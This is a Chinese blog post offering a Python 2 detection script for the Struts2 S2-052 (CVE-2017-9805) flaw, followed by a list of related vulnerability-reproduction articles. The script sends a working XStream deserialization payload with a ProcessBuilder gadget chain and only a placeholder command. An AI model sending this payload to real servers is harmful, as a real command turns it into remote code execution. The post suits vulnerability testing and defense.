S2-052 CVE-2017-9805 python脚本

最新推荐文章于 2022-12-14 19:45:00 发布
最新推荐文章于 2022-12-14 19:45:00 发布
阅读量1.4k 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: python 文章标签: struts2.0
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/rongrong0538/article/details/77875687
本文介绍了一个针对Struts2中S2-052(CVE-2017-9805)漏洞的Python检测脚本。该脚本通过发送恶意构造的数据包来判断目标系统是否受到此远程代码执行漏洞的影响。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

S2-052 CVE-2017-9805 python检查,只对没有处理500的服务有效


#!/usr/bin/env python
#coding=utf-8
# CVE-2017-9805

import requests


def run(params):
    url = params['IP']
    ip = params['PORT']
  
    PoC = '''
<map> 
<entry> 
<jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>xxx</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> 
</entry> 
</map>
          '''
          
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Content-Type': 'application/xml',
    'Content-Length': '16630',
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'}
    
    try:
        d = requests.post(url,data=PoC, headers=headers, timeout=3)
        if d.status_code == 500 and not d.content.find('java.security.Provider$Service') == -1:
            return {'result':'1', 'originalResult':d.content}
        else:
            return {'result':'0', 'originalResult':''}
    except Exception,ex:
        return {'result':'0', 'originalResult':'connect error'}
     
if __name__ == "__main__":
    print run({'IP':'http://192.168.15.81:9999/struts2-rest-showcase/orders', 'PORT':'80'})


[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052CVE-2017-9805
qq_51577576的博客
12-15 1904
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
ApacheStruts2 目录遍历与文件上传漏洞复现(CVE-2024-53677,S2-067)(附脚本
最新发布
iSee857的博客
12-19 1282
CVE-2024-53677 漏洞的根本原因是 Struts 框架中不安全的文件上传处理机制。攻击者利用 CVE-2024-53677 漏洞时,首先会通过构造恶意文件上传请求,利用文件上传表单或API接口,尝试将带有特殊路径的文件上传到服务器。攻击者可以在上传的文件路径中插入“../”序列,从而访问系统中其他目录的文件,甚至修改或执行系统文件。如果上传的恶意文件是可执行的脚本或二进制文件(如PHP、JSP等),并且服务器对文件类型的检测不严格,攻击者就可以通过执行这些文件,获得对服务器
CVE-2017-9805Struts2 漏洞复现与分析)
热门推荐
4ct10n
09-07 1万+
前天发布的新漏洞,以前Struts的漏洞也是经常出,今年三月份就有一次。但这类的洞一直没有跟进,今天也是想着把它给复现一下,同时搭个环境分析一下漏洞形成的原因。0x01 漏洞简介漏洞背景 2017年9月5日,Apache官方发布了一则公告,该公告称Apache Struts2的REST插件存在远程代码执行的高危漏洞,CVE编号为CVE-2017-9805Struts2 REST插件的XStre
CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
weixin_33736649的博客
09-06 405
. 漏洞概述 2017年9月5日,Apache Struts 2官方发布一个严重级别的安全漏洞公告,该漏洞由国外安全研究组织lgtm.com的安全研究人员发现,漏洞编号为CVE-2017-9805(S2-052),在一定条件下,攻击者可以利用该漏洞远程发送精心构造的恶意数据包,获取业务数据或服务器权限,存在高安全风险。 二. 漏洞基本信息...
struts2-CVE-2017-9805
m0_51369969的博客
07-14 255
REST plugin是Struts2的一个处理传入URL请求的插件。 攻击者可以通过构造恶意XML请求在目标服务器上远程执行任意代码。漏洞的成因是由于使用XStreamHandler反序列化XStream实例的时候没有执行严格的过滤导致远程代码执行。...
【vulhub】structs2远程代码执行漏洞 CVE-2017-9805(S2-052
weixin_42884199的博客
12-06 640
前言 2017年9月5日,Apache Struts发布最新安全公告,Apache Struts2的REST插件存在远程代码执行的高危漏洞,该漏洞由lgtm.com的安全研究员汇报,漏洞编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。 影响版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5
CVE-2017-3506-Poc.zip_CVE-2017-3506_CVE-2017-3506 poc_CVE-2017-3
09-24
在本例中,`CVE-2017-3506-Poc.py`是一个Python脚本,用于演示如何利用这个漏洞。攻击者可以创建一个带有特定`Content-Type`的HTTP请求,触发Struts2框架的错误解析逻辑,从而执行恶意代码。这个PoC可能包括了以下...
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-059(CVE-2019-0230
qq_51577576的博客
12-14 925
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-059(CVE-2019-0230) 漏洞产生的主要原因是因为Apache Struts框架在强制执行时,会对分配给某些标签属性(如id)的属性值执行二次ognl解析。攻击者可以通过构造恶意的OGNL表达式,并将其设置到可被外部输入进行修改,且会执行OGNL表达式的Struts2标签的属性值,引发OGNL表达式解析,最终造成远程代码执行的影响。
[ vulhub漏洞复现篇 ] Struts2 远程命令执行漏洞(CVE-2020-17530)(S2-061)
qq_51577576的博客
08-22 849
Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts2020年1208日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。
strust2漏洞批量检查利用python脚本
05-17
python2.7,暂不支持python3,需安装几个python模块。
struts2-052-CVE-2017-9805
weixin_43718688的博客
03-15 292
访问 http://ip:8080/ 即可,能看到如下面这个图,就说明可以了。 点edit,然后点submit抓包 在数据包里构造POC: <map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unm
Struts S2-052漏洞利用之Meterpreter(CVE-2017-9805
weixin_30911451的博客
09-12 364
Struts S2-052漏洞爆出来已经快一周了,大家可能更想知道其危害~鸡肋? 这里就直接给出漏洞利用拿Meterpreter的过程,想了解更多的请参考其他文章,下面是实验演示部分。Struts S2-052漏洞利用之Meterpreter 实验环境 靶机:165.227.29.209 (Ubuntu 16.04 、Apache/2.4.18、Struts 2.5.12struts2...
【高危漏洞预警】CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052)
weixin_34342207的博客
09-06 193
2017年9月5日,Struts官方发布一个严重级别的安全漏洞,该漏洞编号为:S2-052,在一定条件下,攻击者可以利用该漏洞远程发送精心构造的恶意数据包,获取业务数据或服务器权限,存在高安全风险。 漏洞影响范围: Struts 2.5-Struts 2.5.12 漏洞解决方案: 为了确保您在阿里云上的业务安全、可靠的运行,阿里云安全团队友情提示您尽快...
s2-052漏洞复现利用 CVE-2017-9805
w7deer的博客
04-20 1213
S2-052CVE-2017-9805)环境: VulApps/s/struts2/s2-052 at master · Medicean/VulApps · GitHub 访问 http://你的 IP 地址:端口号/ 漏洞poc检测与利用 poc下载: https://github.com/Lone-Ranger/apache-struts-pwn_CVE-2017-9805 检测到漏洞存在: python apache-struts-pwn.py -u 'http://192.1.
Struts2_052_RCE CVE-2017-9805 漏洞复现
ADummy的博客
02-19 393
Struts2_052_远程代码执行 by ADummy 0x00利用路线 ​ burpuite抓包—>修改payload—>重放包—>代码执行 0x01漏洞介绍 ​ Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。 ​ 影响版本 2.1.2 - 2.3.33 2.5 - 2.5.12 0x02漏洞复现 payload1(RCE):
Struts2远程代码执行漏洞CVE-2017-9805 s2-052 绿盟科技发布分析和防护方案
weixin_33711647的博客
09-01 521
5日晚,Struts2远程代码执行漏洞CVE-2017-9805(s2-052),绿盟科技发布扫描工具,今天绿盟科技发布了《Struts2 s2-052 REST插件远程代码执行技术分析与防护方案》,报告全文如下 Struts2s2-052 REST插件远程代码执行技术分析与防护方案 2017年9月5日,Apache Struts发布最新的安全公...
Apache struts2远程命令执行_CVE-2017-9805(S2-052)漏洞复现
WY92139010的博客
07-16 2159
Apache struts2远程命令执行_CVE-2017-9805(S2-052)漏洞复现 一、漏洞概述 Apache Struts2的REST插件存在远程代码执行的高危漏洞,Struts2 REST插件的XStream插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。 二...
【S2-052Struts2远程命令执行漏洞(CVE-2017-9805
Unitue_逆流
10-13 6115
**操作机:**Windows 7**目标IP:**172.16.11.2:8080实验工具: Burp Suite:是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架,本次试验主要用到它的抓包改包功能。 Metasploit:一款
Struts2-057漏洞利用及检测Python脚本详解
S2-057(CVE-2017-9805)是Struts2框架中的一个远程代码执行漏洞,具体属于OSRF(OGNL表达式注入安全风险)。漏洞发生在框架如何处理动态方法调用(DMI)时,攻击者可能利用该漏洞通过恶意构造的请求参数远程执行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值